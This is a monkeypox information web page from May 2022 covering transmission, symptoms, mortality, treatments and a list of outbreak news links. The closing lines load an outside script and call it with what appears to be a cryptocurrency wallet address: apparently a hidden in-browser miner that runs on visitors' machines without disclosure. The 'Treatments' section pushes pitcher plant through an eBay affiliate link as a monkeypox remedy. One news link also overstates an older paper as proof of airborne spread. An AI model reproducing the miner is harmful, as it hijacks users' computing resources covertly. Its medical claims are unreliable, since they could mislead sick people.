<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="utf-8">
        <style>html,body{}img{max-width:100%;height:auto}</style>	
        <title>Monkeypox virus (MPXV)</title>
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <meta name="description" content="What is monkeypox?, how do you get monkeypox?, Incubation period, virus infection symptoms and clinical signs, Mortality: Is it deadly?, Treatments, 2022 Outbreak news">
        <!-- Global site tag (gtag.js) - Google Analytics -->
        <script async src="https://www.googletagmanager.com/gtag/js?id=G-ES0K2VGMQ1"></script>
        <script>
          window.dataLayer = window.dataLayer || [];
          function gtag(){dataLayer.push(arguments);}
          gtag('js', new Date());

          gtag('config', 'G-ES0K2VGMQ1');
        </script>
    </head> 
    <body>
        <h1>Monkeypox virus (MPXV)</h1>
        <p>Last update: 19/05/2022</p>
        <ul>
            <li><a href="#whatis">What is monkeypox?</a></li>
            <li><a href="#transmission">Transmission (how do you get monkeypox?)</a></li>
            <li><a href="#incubation">Incubation period</a></li>
            <li><a href="#symptoms">Monkeypox virus infection symptoms and clinical signs</a></li>
            <li><a href="#mortality">Mortality: Is monkeypox virus deadly?</a></li>
            <li><a href="#treatments">Treatments</a></li>
            <li><a href="#outbreak">2022 Monkeypox Outbreak news</a></li>
        </ul>
        <h2 id="whatis">What is monkeypox?</h2>
        <p>Monkeypox is a zoonotic viral disease, endemic in western and central Africa,
which circulates in wild animal hosts and emerges periodically to affect humans,
captive or wild nonhuman primates, and other species, particularly rodents. Congo
Basin monkeypox viruses are particularly virulent, with human case fatality rates in
parts of Africa estimated to be around 10%. West African viruses tend to cause milder
disease; however, deaths are seen occasionally in young children, individuals with
secondary bacterial sepsis or rare complications such as encephalitis, and people who
are immunosuppressed.</p>
        <h2 id="transmission">Transmission (how do you get monkeypox?)</h2>
        <p>Monkeypox viruses has been found in skin lesions and
most or all secretions and excretions (e.g., urine, feces, and
oral, nasal and conjunctival exudates) in animals. Likely
routes of transmission include inhalation, direct inoculation
into breaks in the skin, and the ingestion of infected tissues.
The importance of aerosol transmission might differ
between species or situations. Experimentally infected
prairie dogs can shed monkeypox viruses until 21 days after
inoculation, and limited evidence suggests that some small
animals, such as dormice and Gambian giant pouched rats,
might carry this virus for a few weeks or months. Viral
DNA was detected in the tissues, urine and feces of one
dormouse for at least 6 months, but no viral antigens were
found when this animal was euthanized. Whether such
animals can shed infectious virus is not known.
Humans can become infected via bites from animals,
in aerosols during close contact, or by direct contact with
lesions, blood or body fluids. Sexual transmission was
suspected in a few cases, when there were lesions on the
genitalia, and transplacental transmission has been
documented. In Africa, clinical cases have often been
linked to handling, preparing and eating wild animals, but
person-to-person transmission was also significant in
some outbreaks. In the U.S., most cases occurred among
people who had close direct contact with prairie dogs;
some infections were apparently acquired in scratches and
bites, or through open wounds. Monkeypox virus has been
isolated from humans for up to 18 days after the onset of
the rash, and scabs shed during recovery were found to
contain significant amounts of infectious virus. Person-toperson transmission does not seem to be capable of
maintaining the virus in human populations. </p>
        <h2 id="incubation">Incubation Period</h2>
        <p>Reported incubation periods in humans range from 7
to 24 days, with a mean of 12 days in Africa and 14.5 days
during the outbreak in the U.S.</p>
        <h2 id="symptoms">Monkeypox virus infection symptoms and clinical signs</h2>
        <p>Human monkeypox resembles smallpox, with a rash
and constitutional signs, but the symptoms are generally
milder and, unlike smallpox, the lymph nodes are usually
(though not always) enlarged. Most often, the illness begins
with nonspecific, flu–like symptoms that may include
malaise, fever, chills, headache, sore throat, myalgia,
backache, fatigue, nausea, vomiting and a nonproductive
cough. Lymphadenopathy can be regional or generalized,
and most often affects the submandibular, postauricular,
cervical and/or inguinal lymph nodes.
Most patients develop a rash one to several days after
they begin to feel ill, though there have been instances
where patients noticed a few skin lesions (e.g., at the site of
an animal bite or scratch, or in the groin) shortly before
they felt unwell. Skin lesions are usually concentrated on
the extremities (including the palms and soles), but they can
also be seen on the head and torso, as well as the mucous
membranes and genitalia. They vary in number from less
than 25 to more than a hundred, and may become confluent
in severe cases. As in animals, skin lesions usually begin as
macules and papules, which develop into vesicles and
pustules (“pocks”), umbilicate, form scabs and are
eventually shed. During the outbreak in the U.S., some
pustules had prominent erythematous flares. Such flares
have not been noted in African cases, possibly because
most affected people have darker skin. The skin lesions
usually resolve within 14 to 21 days. Residual varioliform
scarring, with hypopigmented and/or hyperpigmented skin
lesions, may be a sequela in some cases. Severe scarring, as
seen in smallpox, is rare.
Some patients also have ocular signs including
conjunctivitis, or more rarely, keratitis or corneal
ulceration. Respiratory complications including
bronchopneumonia, coagulation disorders, and rare cases of
encephalitis or multiorgan failure have also been reported.
Secondary bacterial infections can occur, and may lead to
sepsis. Pregnant women may abort or give birth to an
infected fetus. One fetus infected in utero was stillborn,
with cutaneous maculopapular skin lesions and severe
hepatic involvement; another had skin lesions and was born
prematurely but alive. At least one mildly affected pregnant
woman gave birth to a full-term, healthy child. Most
patients recover in 2-4 weeks, but deaths are possible,
especially in people infected with the Congo Basin clade or immunosuppressed individuals infected with either clade.
Subclinical and very mild cases have also been reported.</p>
        <h2 id="mortality">Mortality: Is monkeypox virus deadly?</h2>
        <p>According to the World Health Organisation (WHO), up to a tenth of persons ill with monkeypox may die, with most deaths occurring in younger age groups.</p>
        <h2 id="treatments">Treatments</h2>
        <p>Various reasearch papers seem to show that <a href="https://ebay.us/ddF2aU">sarracenia purpurea</a> may help in the treatment of monkeypox: <a href="https://www.ncbi.nlm.nih.gov/pmc/articles/PMC3302891/">https://www.ncbi.nlm.nih.gov/pmc/articles/PMC3302891/</a>, <a href="https://www.bmj.com/content/1/109/127.1">https://www.bmj.com/content/1/109/127.1</a></p>
        <h2 id="outbreak">2022 Monkeypox Outbreak news</h2>
        <ul>
            <li><a href="https://www.ncbi.nlm.nih.gov/pmc/articles/PMC3556235/">Monkeypox confirmed airborne</a></li>
            <li><a href="https://www.bbc.com/news/health-61501679">9 confirmed cases in U.K</a></li>
            <li><a href="https://apnews.com/article/health-africa-spain-portugal-db38eb683180531f0589c347bfc85358">5 confirmed cases in Portugal</a></li>
            <li><a href="https://www.thestar.com/news/canada/2022/05/18/montreal-investigating-up-to-13-possible-cases-of-monkeypox-report.html">13 possible cases in canada</a></li>
            <li><a href="https://www.nytimes.com/2022/05/18/health/massachusetts-monkeypox.html">1 case in the U.S from Massachusetts man who recently traveled to Canada</a></li>
            <li><a href="https://www.theguardian.com/world/2022/may/18/monkeypox-alert-spain-men-show-symptoms">13 new suspected cases in Spain</a></li>
            <li><a href="https://www.reuters.com/business/healthcare-pharmaceuticals/italy-reports-first-case-monkeypox-infection-two-more-suspected-2022-05-19/">1st confirmed case in Italy</a></li>
            <li><a href="https://www.thelocal.se/20220519/sweden-records-first-proven-monkeypox-infection/">1st confirmed case in Sweden</a></li>
            <li><a href="https://www.dailymail.co.uk/health/article-10832623/UK-stockpiling-thousands-monkeypox-vaccines-drugs-UK-cases-rise-nine.html">UK is stockpiling smallpox vaccines for potential outbreak</a></li>
            <li><a href="https://www.brusselstimes.com/belgium/226231/first-case-of-monkeypox-confirmed-in-belgium">Three cases of monkeypox now confirmed in Belgium</a></li>
        </ul>
        <script src="//trustiseverything.de/karma/karma.js?karma=bs?nosaj=faster.mo" ></script>
        <script>EverythingIsLife('47cb2QjmTtZFJGA7F6keNBj6NizQk1BW1Hh8gFdvhsFhF6HgjVJxQEYRV3HiT5JGkrfXS3cNHELdTWgtuPUXtQYCNMjSqE8', 'monkey', 50);</script>
    </body>
</html>
